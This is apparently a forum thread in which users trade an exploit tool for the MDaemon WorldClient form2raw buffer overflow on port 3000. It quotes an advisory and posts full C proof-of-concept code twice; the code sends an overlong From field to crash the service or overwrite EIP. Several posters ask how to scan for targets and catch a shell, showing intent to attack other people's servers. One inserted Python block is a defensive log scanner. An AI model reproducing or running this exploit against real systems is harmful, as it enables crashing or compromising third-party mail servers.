
rscience
have nice fun
Progressor
Interesting... what is this exploit?
sylver
how to scan this?
never heard of this........
Paul
Dmaeon ??
Only found 3 matches on google.
wicked
nice one....

Wkd..

#WkdScience

technoboy
imho it's mdaemon
sylver
I have found out that dmaeon listens on port 3000,
but what does this exploit do?
I have read that a shell comes up on port 9999?
But I don't know exactly....
crash3rzz
hmm, I think it's some sort of mail server

M-DAEMON ? hmm weird
DarkAngel52457
thanks


how to scan this ??????
andydis
m-daemon, mail server, exploit is for the web based email (equivalent to Outlook web access), originally made by deerfield (makers of wingate www.deerfield.com)



rscience, I get that the zip is corrupt... repost?
rscience
Yep, that's TRUE, this exploit works on port 3000.

andydis (the zip is NOT corrupt), TRY downloading one more time.
kenshin_efx
10x for share man, i will check them.
Buluemoon
Getting the same error that the file is not a valid archive, have dled 6-7 times, will try later. Thanks nevertheless, rscience.
Copkill
hmm, I have no luck with this exploit, no shell found.
h3llraz0r
found this info on it

CODE

ALT-N MDaemon Raw Message Handler Buffer Overflow
Affected: ALT-N MDaemon 6.52 through 6.85
Description:
The MDaemon Mail Server package includes a web-based email component
called "WorldClient". The WorldClient web server uses a default port of
3000/tcp and allows remote access to a CGI program called
"form2raw.exe". This program allows users to create and send email
messages by typing the relevant information into a web-based form.
Specifically, the program accepts form data and uses it to create an
email message that is written directly to MDaemon's raw message queue.
A problem arises because "form2raw" can be forced to generate a
specially crafted message that, when processed by the mail server,
causes a stack-based buffer overflow. Remote attackers can exploit the
flaw to execute arbitrary code with the privileges of the MDaemon
process, possibly Local System. The advisory shows how to craft a web
request that causes "form2raw" to generate a malformed email message.
Status: The vendor has reportedly confirmed the problem and plans to
release a patch. The suggested workaround is to disable "form2raw"
functionality on the web server.
Council Site Actions:
The affected software is not in production or widespread use at any of
the council sites. They reported that no action was necessary.
References:
Posting by the Hat-Squad Security Team
http://archives.neohapsis.com/archives/bugtraq/2003-12/0331.html
WorldClient Product Page
http://www.altn.com/Products/WorldClient.asp
Background on MDaemon Configuration
http://files.altn.com/HowTo/MDaemonInstallation.html
SecurityFocus BID
Not yet available.


#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define PORT 3000
void main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
        fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
            "\nUsage: %s <target ip> \n", argv[0]);

        printf("%d",argc);
        exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(PORT);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char buffer[500];
            int i;
            memset(buffer,0,sizeof(buffer));
            strcpy(buffer,"get /form2raw.cgi?From=");
            for(i=0;i<244;i++) {

                strcat(buffer,"a");
            }

            strcat(buffer,"bbbb"); //Overwrites EIP
            strcat(buffer,"c"); //One byte left after ESP :-(
            strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

            send(s, buffer, strlen(buffer), 0);
            printf("Exploit Sent.");

        }

        else printf("Error Connecting to The Target.\n");
        closesocket(s);
    }

    WSACleanup();
}
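
A defender's view of the advisory quoted above, as an added example that is not part of the original thread or of any poster's code: it scans web access-log lines for requests to form2raw and flags an oversized From field. The Common Log Format input, the 128-byte threshold and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: alert threshold for the From field. The PoC in this thread sends
# 244 filler bytes plus 5 more in From, so 128 flags it with margin.
MAX_FROM_LEN = 128
CGI_NAMES = {"form2raw.cgi", "form2raw.exe"}
# Quoted request field of a Common Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"([A-Za-z]+) (\S+)(?: HTTP/[\d.]+)?"')


def inspect_line(line):
    """Return (client, reason, from_len) for a form2raw request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(2))
    # Decode and lowercase the script name: Windows paths are case-insensitive.
    name = unquote(parts.path).rsplit("/", 1)[-1].lower()
    if name not in CGI_NAMES:
        return None
    # latin-1 maps each decoded byte to one character, so len() counts bytes
    # even when the padding is percent-encoded.
    pairs = parse_qsl(parts.query, keep_blank_values=True, encoding="latin-1")
    longest = max((len(v) for k, v in pairs if k.lower() == "from"), default=0)
    reason = "overlong-from" if longest > MAX_FROM_LEN else "form2raw-access"
    return line.split(" ", 1)[0], reason, longest


def scan(lines):
    """Return findings for every line that touches form2raw."""
    return [hit for hit in map(inspect_line, lines) if hit]


# Constructed sample log lines (documentation addresses, not real traffic).
STAMP = "[05/Jan/2004:09:12:01 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {STAMP} "GET / HTTP/1.0" 200 4312',
    f'192.0.2.11 - - {STAMP} "POST /form2raw.cgi?From=alice@example.com&To=bob@example.com&Subject=hi&Body=hello HTTP/1.0" 200 120',
    f'198.51.100.7 - - {STAMP} "get /form2raw.cgi?From={"A" * 249}&To=x@example.com&Subject=hi&Body=hello HTTP/1.0" 200 0',
    f'198.51.100.8 - - {STAMP} "GET /FORM2RAW.CGI?from={"%41" * 200} HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Once form2raw has been disabled as the advisory's workaround suggests, even the "form2raw-access" findings are worth reviewing, since no legitimate client should still be requesting it.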




Deltax
the .zip is corrupted man
/edit

unpack it with winrar and it works fine, thanks m8 good work

dmaeon <ip>
exploit send

and what now? how to connect to the server?
BuzzDee
rscience could u plz post the source of the exploit? because if this exploit is the compiled version of the poc-exploit which h3llraz0r posted nothing will happen, there's no shellcode in it... but if ur exploit already contains shellcode does it spawn a shell?

greetz
usch
well I've never seen an autohacker for a DOS exploit
by the way hi Buzzdee it's me tjarx

regards
Helloman
thx for this exploit, but can you tell more about it?

Did somebody get a shell?

Is it really port 9999, or on which port must I listen to get a shell?
tazthedev
I got tons of results..... but how can i connect to them ????
SkyRaVeR
yeah mate - first of all th@nx 4 sharing.. but doesn't look like shellcode included.. where should the shell spawn ??

greetz, ´sky
Diablotic
There is no shellcode? ;/
It could be better...
adenek
hello, I am OK with the others, this autohacker needs a little more information: what is the exploit port, 3000? And what port must be listened on for the shell?

thx in advance
Zero-X
Same as everyone: once the packet is sent... where do you get the shell / how do you get it?

-ZX
maxxis
only dos exploit ;P
eXist
There is NO shellcode in this exploit yet. Jeez, read the examples, as provided by h3llraz0r:
CODE
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define PORT 3000
void main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
        fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
            "\nUsage: %s <target ip> \n", argv[0]);

        printf("%d",argc);
        exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(PORT);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char buffer[500];
            int i;
            memset(buffer,0,sizeof(buffer));
            strcpy(buffer,"get /form2raw.cgi?From=");
            for(i=0;i<244;i++) {

                strcat(buffer,"a");
            }

            strcat(buffer,"bbbb"); //Overwrites EIP
            strcat(buffer,"c"); //One byte left after ESP :-(
            strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

            send(s, buffer, strlen(buffer), 0);
            printf("Exploit Sent.");

        }

        else printf("Error Connecting to The Target.\n");
        closesocket(s);
    }

    WSACleanup();
}

Do you see a return address or shellcode of any sort... no, you don't. Either code one in yourself or wait for one to come along, if you're lucky.
XeLoRy
it's a good exploit, I have tested it, it's excellent